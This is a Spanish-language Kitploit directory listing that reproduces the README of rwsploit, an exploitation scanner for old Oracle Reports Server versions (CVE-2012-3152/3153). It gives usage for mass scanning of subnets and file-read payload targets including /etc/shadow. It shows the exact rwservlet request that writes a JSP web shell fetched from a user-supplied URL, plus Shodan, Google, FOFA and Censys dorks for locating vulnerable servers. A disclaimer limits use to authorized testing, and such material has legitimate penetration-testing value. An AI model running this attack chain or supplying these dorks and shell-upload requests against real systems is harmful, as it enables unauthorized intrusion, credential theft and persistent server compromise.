Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
rwsploit — Escáner automatizado de explotación para Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Detecta, identifica, lee archivos mediante LFI, prueba SSRF a través de webhook y sube shells JSP. Apunta a Oracle Reports < 11g. Solo para uso autorizado. | Kitploit
Herramientas/GitHubGitHub/abq0/rwsploit
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubabq0/rwsploit

rwsploit

Escáner automatizado de explotación para Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Detecta, identifica, lee archivos mediante LFI, prueba SSRF a través de webhook y sube shells JSP. Apunta a Oracle Reports < 11g. Solo para uso autorizado.

6hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

Escáner Oracle Reports rwservlet

⚠️ Solo para uso autorizado. Ejecute esta herramienta únicamente contra sistemas que posea o para los que tenga permiso explícito por escrito. El uso no autorizado es ilegal.

Un escáner de explotación enfocado para Oracle Reports Server (rwservlet) que apunta a CVE-2012-3152 y CVE-2012-3153 — afectando versiones anteriores a 11g. Automatiza detección, lectura de archivos LFI, pruebas SSRF y carga de shell JSP en IPs individuales, rangos CIDR o listas de objetivos. El prefiltrado inteligente TCP/HTTP salta hosts muertos al instante para no perder tiempo.


Instalación

root@kitploit:~
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests

Requiere Python 3.8+. Sin otras dependencias.


Uso

root@kitploit:~
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file>   [options]

Ejecute sin argumentos para ver el menú de ayuda completo y los dorks de reconocimiento.


Opciones


Ejemplos

root@kitploit:~
# Solo detección
python3 rwsploit.py -t 10.10.10.55 -p 7777

# Detección + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# Cadena completa — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# Escaneo de subred, guardar volcados
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# Desde archivo, sin SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf

Formato de targets.txt

root@kitploit:~
# comment — skipped
10.10.10.55
10.10.11.0/24

Características

LFI

Lee archivos legibles por el mundo detectando primero el SO mediante showenv, luego ejecuta solo el conjunto de cargas coincidentes.

Linux — /etc/passwd, /etc/shadow, /etc/hosts, /etc/issue, /etc/os-release, /etc/group, /etc/crontab, /etc/timezone, /proc/version, /proc/cmdline, /proc/self/environ

Windows — win.ini, system32\drivers\etc\hosts, boot.ini, system.ini, AUTOEXEC.BAT

🚨 Que no haya salida LFI no significa que el objetivo sea seguro — la configuración y permisos de archivos de Oracle varían. Siempre pruebe SSRF y carga de shell de forma independiente.

SSRF

Dispara rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> y consulta la API de webhook.site para una devolución de llamada. Imprime la IP origen, método y User-Agent en el impacto. Se crea automáticamente un token de webhook nuevo al inicio.

Subida de Shell (--shell)

  1. Solicita la URL que sirve su contenido de shell JSP
  2. Lee PATH_TRANSLATED de showenv para obtener la ruta real del webroot
  3. Genera un nombre de shell aleatorio (ej. kxqbrmfa.jsp)
  4. Lo escribe mediante: rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>
  5. Verifica comprobando que la URL del shell devuelva HTTP 200 e imprime el enlace activo

Dorks de Reconocimiento — Oracle Reports < v11

Google

root@kitploit:~
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet

Shodan

root@kitploit:~
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"

FOFA

root@kitploit:~
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"

Censys

root@kitploit:~
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"

CVEs

CVEDescripción
CVE-2012-3152Lectura de archivos no autenticada a través del parámetro report de rwservlet
CVE-2012-3153SSRF y escritura de archivos a través de JOBTYPE=rwurl + URLPARAMETER

Afecta a Oracle Reports Server 6i, 9i, 10g — corregido en 11g.


Legal

Solo para pruebas de penetración autorizadas, desafíos CTF e investigación de seguridad. El autor no asume ninguna responsabilidad por el mal uso.

Descargar herramienta
FlagDescripciónPor defecto
-tIP, hostname o CIDR de destino. Se aceptan múltiples valores.—
-fArchivo con una IP o CIDR por línea. # = comentario.—
-pPuerto personalizado único — anula la lista de puertos por defecto.80 443 8080 7777 7778 7779 8443 9090
-THilos concurrentes.15
-oGuardar volcados LFI en disco con este prefijo. Ej: -o loot → loot_<ip>_<port>_<file>.txtsolo stdout
--timeoutTiempo de espera en segundos.10
--lfiEjecutar cargas útiles de lectura de archivos LFI. Primero se detecta el SO para que solo se ejecuten las cargas relevantes.desactivado
--no-ssrfOmitir prueba de webhook SSRF.desactivado
--shellSubir un shell JSP. Solicita la URL que sirve su contenido de shell.desactivado
-hMostrar ayuda y dorks de reconocimiento.—